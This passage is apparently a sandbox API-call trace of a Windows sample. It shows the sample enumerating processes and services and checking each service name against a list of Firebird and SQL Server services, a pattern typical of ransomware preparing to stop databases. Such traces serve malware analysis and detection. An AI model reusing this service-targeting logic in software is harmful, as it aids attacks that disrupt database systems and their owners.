szExeFile="cmd.exe")) returned 1 [0211.707] lstrlenW (lpString="cmd.exe") returned 7 [0211.707] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.708] lstrlenW (lpString="conhost.exe") returned 11 [0211.708] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0211.709] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0211.709] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0211.709] CloseHandle (hObject=0x3f4) returned 1 [0211.709] Sleep (dwMilliseconds=0x1f4) [0212.216] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bc10 [0212.216] EnumServicesStatusExW (in: hSCManager=0x236bc10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0212.216] GetLastError () returned 0xea [0212.216] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40fae90 [0212.216] EnumServicesStatusExW (in: hSCManager=0x236bc10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40fae90, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40fae90, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0212.217] CloseServiceHandle (hSCObject=0x236bc10) returned 1 [0212.217] lstrlenW (lpString="Appinfo") returned 7 [0212.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0212.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0212.217] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0212.217] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0212.217] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0212.217] lstrlenW (lpString="AppXSvc") returned 7 [0212.217] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0212.217] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0212.217] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0212.217] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0212.218] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0212.218] lstrlenW (lpString="Audiosrv") returned 8 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0212.218] lstrlenW (lpString="BFE") returned 3 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0212.218] lstrlenW (lpString="BITS") returned 4 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0212.218] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0212.218] lstrlenW (lpString="CDPSvc") returned 6 [0212.218] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0212.218] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0212.218] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0212.218] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0212.218] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0212.219] lstrlenW (lpString="ClickToRunSvc") returned 13 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0212.219] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0212.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0212.219] lstrlenW (lpString="ClipSVC") returned 7 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0212.219] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0212.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0212.219] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0212.219] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0212.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0212.219] lstrlenW (lpString="CryptSvc") returned 8 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0212.219] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0212.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0212.219] lstrlenW (lpString="DcomLaunch") returned 10 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0212.219] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0212.219] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0212.219] lstrlenW (lpString="DeviceAssociationService") returned 24 [0212.219] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0212.219] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0212.219] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0212.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0212.220] lstrlenW (lpString="Dhcp") returned 4 [0212.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0212.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0212.220] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0212.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0212.220] lstrlenW (lpString="Dnscache") returned 8 [0212.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0212.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0212.220] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0212.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0212.220] lstrlenW (lpString="DoSvc") returned 5 [0212.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0212.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0212.220] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0212.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0212.220] lstrlenW (lpString="DPS") returned 3 [0212.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0212.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0212.220] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0212.220] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0212.220] lstrlenW (lpString="DusmSvc") returned 7 [0212.220] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0212.220] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0212.220] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0212.220] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0212.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0212.221] lstrlenW (lpString="EventLog") returned 8 [0212.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0212.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0212.221] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0212.221] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0212.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0212.221] lstrlenW (lpString="EventSystem") returned 11 [0212.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0212.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0212.221] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0212.221] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0212.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0212.221] lstrlenW (lpString="FontCache") returned 9 [0212.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0212.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0212.221] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0212.221] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0212.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0212.221] lstrlenW (lpString="gpsvc") returned 5 [0212.221] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0212.221] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0212.221] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0212.221] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0212.221] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0212.221] lstrlenW (lpString="iphlpsvc") returned 8 [0212.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0212.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0212.222] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0212.222] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0212.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0212.222] lstrlenW (lpString="KeyIso") returned 6 [0212.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0212.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0212.222] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0212.222] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0212.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0212.222] lstrlenW (lpString="LanmanServer") returned 12 [0212.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0212.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0212.222] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0212.222] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0212.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0212.222] lstrlenW (lpString="LanmanWorkstation") returned 17 [0212.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0212.222] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0212.222] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0212.222] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0212.222] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0212.222] lstrlenW (lpString="lfsvc") returned 5 [0212.222] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0212.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0212.223] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0212.223] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0212.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0212.223] lstrlenW (lpString="LicenseManager") returned 14 [0212.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0212.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0212.223] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0212.223] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0212.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0212.223] lstrlenW (lpString="lmhosts") returned 7 [0212.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0212.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0212.223] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0212.223] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0212.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0212.223] lstrlenW (lpString="LSM") returned 3 [0212.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0212.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0212.223] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0212.223] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0212.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0212.223] lstrlenW (lpString="MpsSvc") returned 6 [0212.223] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0212.223] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0212.223] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0212.223] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0212.223] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0212.224] lstrlenW (lpString="NcbService") returned 10 [0212.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0212.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0212.224] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0212.224] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0212.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0212.224] lstrlenW (lpString="netprofm") returned 8 [0212.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0212.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0212.224] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0212.224] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0212.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0212.224] lstrlenW (lpString="NlaSvc") returned 6 [0212.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0212.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0212.224] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0212.224] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0212.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0212.224] lstrlenW (lpString="nsi") returned 3 [0212.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0212.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0212.224] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0212.224] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0212.224] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0212.224] lstrlenW (lpString="PcaSvc") returned 6 [0212.224] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0212.224] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0212.224] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0212.224] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0212.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0212.225] lstrlenW (lpString="PlugPlay") returned 8 [0212.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0212.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0212.225] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0212.225] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0212.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0212.225] lstrlenW (lpString="Power") returned 5 [0212.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0212.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0212.225] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0212.225] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0212.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0212.225] lstrlenW (lpString="ProfSvc") returned 7 [0212.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0212.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0212.225] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0212.225] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0212.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0212.225] lstrlenW (lpString="RpcEptMapper") returned 12 [0212.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0212.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0212.225] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0212.225] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0212.225] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0212.225] lstrlenW (lpString="RpcSs") returned 5 [0212.225] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0212.225] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0212.225] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0212.225] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0212.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0212.226] lstrlenW (lpString="SamSs") returned 5 [0212.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0212.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0212.226] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0212.226] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0212.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0212.226] lstrlenW (lpString="Schedule") returned 8 [0212.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0212.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0212.226] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0212.226] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0212.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0212.226] lstrlenW (lpString="SecurityHealthService") returned 21 [0212.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0212.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0212.226] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0212.226] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0212.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0212.226] lstrlenW (lpString="SENS") returned 4 [0212.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0212.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0212.226] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0212.226] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0212.226] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0212.226] lstrlenW (lpString="ShellHWDetection") returned 16 [0212.226] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0212.226] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0212.226] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0212.226] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0212.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0212.227] lstrlenW (lpString="Spooler") returned 7 [0212.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0212.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0212.227] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0212.227] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0212.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0212.227] lstrlenW (lpString="sppsvc") returned 6 [0212.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0212.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0212.227] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0212.227] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0212.227] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0212.227] lstrlenW (lpString="SSDPSRV") returned 7 [0212.227] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0212.227] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0212.227] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0212.227] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0212.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0212.234] Process32FirstW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.235] Process32NextW (in: hSnapshot=0x3ac, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, 